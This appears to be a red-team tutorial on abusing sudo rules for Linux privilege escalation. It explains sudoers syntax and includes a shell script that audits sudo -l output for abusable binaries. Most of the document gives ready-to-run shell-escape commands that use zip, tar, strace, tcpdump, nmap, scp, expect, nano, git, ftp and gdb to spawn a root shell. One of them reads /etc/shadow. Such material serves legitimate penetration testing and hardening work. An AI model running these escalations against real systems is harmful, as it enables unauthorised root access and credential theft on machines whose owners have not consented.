Abusing SUDO Advance for Linux Privilege Escalation
Index
- zip
- tar
- strace
- tcpdump
- nmap
- scp
- expect
- nano & pico
- git
- ftp/gdb
What is SUDO?
The sudo (Substitute User and Do) command lets a user run commands with the privileges of another user (root by default), with every invocation logged. In other words, users can execute commands as root (or as another user) by entering their own password instead of root's, or with no password at all, depending on the sudoers configuration. The rules that decide whether access is granted live in the /etc/sudoers file.
Scenario.
During red teaming we sometimes run into a situation where we need to escalate our privileges to root or to another user. If the current user has a sudo rule for a binary that can spawn a shell or execute arbitrary commands, an attacker can use that rule to obtain a shell as the target user.
Sudoers File Syntax.
root ALL=(ALL) ALL
Explain 1: The root user can use sudo on ALL hosts, acting as ALL (any) users, and run ALL (any) commands.
The first field is the user, the second is the host(s) on which the rule applies, the third (in parentheses) is which users he may act as, and the last one is which commands he may run through sudo. When the runas part in parentheses is omitted, the command runs as root.
touhid ALL= /sbin/poweroff
Explain 2: The above rule lets the user touhid, on any host, run poweroff (as root, the default) after entering touhid's own password.
touhid ALL = (root) NOPASSWD: /usr/bin/find
Explain 3: The above rule lets the user touhid, on any host, run find as the root user without entering a password.
Exploiting SUDO Users.
To exploit a sudo rule you first need to find out which commands you are allowed to run:
$ sudo -l
The above command lists the commands the current user may run through sudo, as which user, and whether a password is required.
In the example used here, sudo -l shows that the user may run all of the binaries in the index as root without a password.
Let's take a look at these binaries one by one (only those mentioned in the index) and escalate privileges to the root user.
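The sudoers syntax explained above and the sudo -l output it produces can be checked automatically. The following POSIX sh script is an added example written for this page, not the author's own code: parse_rule splits a sudoers rule into user, host, runas, NOPASSWD flag and command; is_abusable checks the binary's basename against the binaries abused in the sections that follow (plus find, which appears in the sudoers example above and can run arbitrary commands through -exec); audit_sudo_l runs that check over captured sudo -l output. The ABUSABLE list and the sample sudo -l output are constructed for this example and are not from a real host.

```shell
#!/bin/sh
# Added example, not code from the original post: a small POSIX sh audit that
# parses sudoers-style rules and flags rules that hand out one of the binaries
# this page abuses for a root shell. ABUSABLE and SAMPLE_SUDO_L are constructed.

ABUSABLE="zip tar strace tcpdump nmap scp expect nano pico git ftp gdb find"

# ltrim STRING: strip leading whitespace using only parameter expansion
ltrim() { printf '%s' "${1#"${1%%[![:space:]]*}"}"; }

# parse_rule 'touhid ALL = (root) NOPASSWD: /usr/bin/find'
# prints  user|host|runas|nopasswd|command
parse_rule() {
    rule=$1
    lhs=${rule%%=*}                  # "touhid ALL " -> user and host
    spec=$(ltrim "${rule#*=}")       # "(root) NOPASSWD: /usr/bin/find"
    set -- $lhs                      # intentional word split: $1=user $2=host
    user=$1; host=$2
    runas=root                       # sudoers default when no (runas) is given
    case "$spec" in
        \(*) runas=${spec#\(}; runas=${runas%%\)*}
             spec=$(ltrim "${spec#*\)}") ;;
    esac
    nopasswd=no
    case "$spec" in
        NOPASSWD:*) nopasswd=yes; spec=$(ltrim "${spec#NOPASSWD:}") ;;
    esac
    printf '%s|%s|%s|%s|%s\n' "$user" "$host" "$runas" "$nopasswd" "$spec"
}

# is_abusable '/usr/bin/find -name x': true if the command (or ALL) is on the list.
# Only the binary's basename is checked; argument restrictions in the rule are
# not evaluated, so treat a hit as "worth a closer look", not as proof.
is_abusable() {
    [ "$1" = "ALL" ] && return 0     # ALL = any command, a shell included
    set -- $1                        # first word is the binary path
    base=${1##*/}
    for b in $ABUSABLE; do
        [ "$base" = "$b" ] && return 0
    done
    return 1
}

# audit_sudo_l: read "sudo -l" output on stdin and print one line per abusable
# command granted. Rule lines look like "    (root) NOPASSWD: /usr/bin/find".
audit_sudo_l() {
    while IFS= read -r line; do
        case "$line" in
            *\(*\)*) ;;                 # only rule lines carry a (runas) spec
            *) continue ;;              # skip "User x may run..." and Defaults
        esac
        parsed=$(parse_rule "me ALL=$(ltrim "$line")")
        runas=$(printf '%s' "$parsed" | cut -d'|' -f3)
        nopw=$(printf '%s' "$parsed" | cut -d'|' -f4)
        cmds=${parsed##*|}
        # a single rule may list several commands separated by commas
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r c; do
            c=$(ltrim "$c")
            if is_abusable "$c"; then
                printf 'ABUSABLE: %s (as %s, nopasswd=%s)\n' "$c" "$runas" "$nopw"
            fi
        done
    done
}

# Constructed sample of "sudo -l" output (not captured from a real host).
SAMPLE_SUDO_L='Matching Defaults entries for touhid on victim:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User touhid may run the following commands on victim:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/zip
    (ALL) /sbin/poweroff
    (root) /usr/bin/git'

# Run the audit over the sample; real use: sudo -l | audit_sudo_l
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l
```

On a real host replace the sample with the live output (sudo -l | audit_sudo_l) or feed it the rule lines of /etc/sudoers through parse_rule; a NOPASSWD hit on a binary from the list is exactly the situation the rest of this post walks through.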
Using zip command
$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
(/tmp/test must exist; -T tests the archive by calling the given unzip command, which here is a shell.)
Using tar command
$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
(testfile must exist; the checkpoint action is executed as soon as the first record is written.)
Using strace command
$ sudo strace -o /dev/null /bin/bash
Using tcpdump command
$ echo $'id\ncat /etc/shadow' > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root
(-z runs the script as the post-rotate command after each capture file is rotated; -Z root keeps tcpdump from dropping privileges before it does so.)
Using nmap command
$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse
Using scp command
$ sudo scp -S /path/yourscript x y
(-S sets the program scp uses for the connection, so your script runs as root.)
Using expect command
$ sudo expect
At the expect prompt, type spawn sh, then sh.
Using nano command
$ sudo nano -s /bin/bash
Type your command into the buffer and hit CTRL+T: -s sets the spell-checker program, so CTRL+T runs /bin/bash on the buffer as root.
Using git command
$ sudo git help status
In the pager, type: !/bin/bash
Using gdb/ftp command
$ sudo ftp
Type: !/bin/sh
gdb accepts the same escape (! is shorthand for its shell command):
$ sudo gdb
Type: !/bin/sh